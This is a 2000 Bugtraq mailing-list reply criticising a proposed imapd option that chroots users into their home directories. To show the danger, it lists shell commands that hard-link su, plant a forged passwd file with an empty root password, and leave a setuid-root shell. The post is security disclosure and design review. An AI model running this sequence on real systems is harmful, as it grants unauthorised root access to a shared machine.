[14565] in bugtraq
Re: response to the bugtraq report of buffer overruns in imapd
daemon@ATHENA.MIT.EDU (R. C. Dowdeswell)
Wed Apr 19 04:13:53 2000
Message-Id: <20000418060249.00EB0DBB@mabelode.imrryr.org>
Date: Mon, 17 Apr 2000 23:02:48 -0700
Reply-To: "R. C. Dowdeswell" <elric@imrryr.org>
From: "R. C. Dowdeswell" <elric@MABELODE.IMRRYR.ORG>
X-To: Mark Crispin <MRC@CAC.WASHINGTON.EDU>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: Your message of "Mon, 17 Apr 2000 18:24:59 PDT."
<MailManager.956021099.15421.mrc@Ikkoku-Kan.Panda.COM>
On 956021099 seconds since the Beginning of the UNIX epoch
Mark Crispin wrote:
>
>The final form of the CHROOT_SERVER code, which will be an option in the next
>distributed version, consists of:
> if (chroot (home ? home : ANONYMOUSHOME)) return NIL;
> home = "/";
>And, yes, this will do the necessary chdir().
chroot(2)'ing to a users home directory is rather a bad idea in a lot of
setups. For example, assume that the machine has one large disk and one
partition. Then for a decent number of unices would be vulnerable (on a
shell enabled machine) to:
$ cd
$ mkdir etc
$ ln /usr/bin/su
$ cp /bin/sh .
$ cat root::... > etc/passwd
imap in, get into a chroot(2) jail ain your home dir, get a shell, su.
Then
# chmod 4755 sh
Using chroot in a lot of situations is rather dangerous, and one
must carefully set up the environment that it runs in.
IIRC, the default install of some unices/linuces is to have only one
partition.
== Roland Dowdeswell http://www.Imrryr.ORG/~elric/ ==
== The Unofficial NetBSD Web Pages http://www.Imrryr.ORG/NetBSD/ ==
== The NetBSD Project http://www.NetBSD.ORG/ ==
